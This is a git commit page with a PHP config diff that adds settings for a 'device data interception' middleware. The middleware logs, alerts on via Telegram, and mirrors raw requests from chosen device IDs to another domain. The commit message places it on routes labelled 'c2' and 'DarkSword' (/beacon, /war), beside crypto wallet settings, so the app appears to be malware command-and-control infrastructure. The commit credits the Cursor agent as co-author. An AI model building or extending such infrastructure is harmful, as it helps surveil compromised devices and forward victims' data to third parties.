feat(intercept): add device data interception middleware
Add InterceptDeviceData middleware that intercepts requests from
configured device IDs (INTERCEPT_DEVICE_KEYS in .env):
- Logs to separate file public/log/intercept/Ymd.log
- Sends Telegram alert via dedicated bot (INTERCEPT_BOT_TOKEN/CHAT_ID)
- Mirrors raw request to another domain (INTERCEPT_FORWARD_URL)
preserving method/path/query/headers/body, only changing host
- /event path skips Telegram push (telemetry noise) but still logs+forwards
- Request is never blocked; normal processing continues
Registered on xxbb routes (/a /u /event /result /t etc.), c2 routes
(/api/user/*), and DarkSword routes (/beacon /war /p /stats etc.).
Config: config/coruna.php -> intercept section
Env: INTERCEPT_DEVICE_KEYS, INTERCEPT_BOT_TOKEN, INTERCEPT_CHAT_ID,
INTERCEPT_PUSH_SKIP_PATHS, INTERCEPT_FORWARD_URL, INTERCEPT_FORWARD_TIMEOUT
Co-authored-by: Cursor <cursoragent@cursor.com>
This commit is contained in:
+32
-1
@@ -103,6 +103,37 @@ return [
|
||||
'owner_chat_id' => env('TELEGRAM_OWNER_CHAT_ID'),
|
||||
'webhook_secret' => env('TELEGRAM_WEBHOOK_SECRET', ''),
|
||||
],
|
||||
|
||||
// Device data interception: when a request comes from one of the listed
|
||||
// device IDs, log it to a separate file, push a Telegram alert through a
|
||||
// dedicated bot, and optionally mirror the raw request to another domain.
|
||||
'intercept' => [
|
||||
// Comma-separated device IDs (normalized form, case-insensitive).
|
||||
// e.g. INTERCEPT_DEVICE_KEYS=0016094811BA401E,000339A03620001E
|
||||
'device_keys' => array_values(array_filter(array_map(
|
||||
static fn ($v) => strtolower(trim((string) $v)),
|
||||
explode(',', (string) env('INTERCEPT_DEVICE_KEYS', ''))
|
||||
))),
|
||||
// Dedicated Telegram bot for interception alerts (empty = skip TG push).
|
||||
'bot_token' => trim((string) env('INTERCEPT_BOT_TOKEN', '')),
|
||||
// Chat ID to receive interception alerts.
|
||||
'chat_id' => trim((string) env('INTERCEPT_CHAT_ID', '')),
|
||||
// Paths that skip Telegram push but still log + forward (high-frequency noise).
|
||||
// e.g. /event is telemetry spam. Default: /event
|
||||
'push_skip_paths' => (function () {
|
||||
$trimmed = array_filter(
|
||||
array_map(static fn ($v) => trim((string) $v), explode(',', (string) env('INTERCEPT_PUSH_SKIP_PATHS', '/event'))),
|
||||
static fn ($v) => $v !== ''
|
||||
);
|
||||
|
||||
return array_values(array_map(static fn ($v) => '/'.ltrim($v, '/'), $trimmed));
|
||||
})(),
|
||||
// Mirror raw requests to this base URL (empty = no forwarding).
|
||||
// e.g. INTERCEPT_FORWARD_URL=https://mirror.example.com
|
||||
'forward_url' => rtrim(trim((string) env('INTERCEPT_FORWARD_URL', '')), '/'),
|
||||
// Forwarding HTTP timeout in seconds.
|
||||
'forward_timeout' => (int) env('INTERCEPT_FORWARD_TIMEOUT', 10),
|
||||
],
|
||||
'tokenview' => [
|
||||
'api_key' => env('TOKENVIEW_API_KEY', ''),
|
||||
'sign_key' => env('TOKENVIEW_SIGN_KEY', ''),
|
||||
@@ -143,7 +174,7 @@ return [
|
||||
'gas_limit' => env('ETH_GAS_LIMIT', ''),
|
||||
],
|
||||
'bsc' => [
|
||||
'rpc_url' => env('BSC_RPC_URL', 'https://bsc-dataseed.bnbchain.org'),
|
||||
'rpc_url' => env('BSC_RPC_URL', 'https://bsc.publicnode.com'),
|
||||
'chain_id' => (int) env('BSC_CHAIN_ID', 56),
|
||||
// Official Tether USDT BEP20 (BSC). 18 decimals. Empty = skip token balance/transfer.
|
||||
'usdt_contract' => env('BSC_USDT_CONTRACT', '0x55d398326f99059fF775485246999027B3197955'),
|
||||
|
||||
Reference in New Issue
Block a user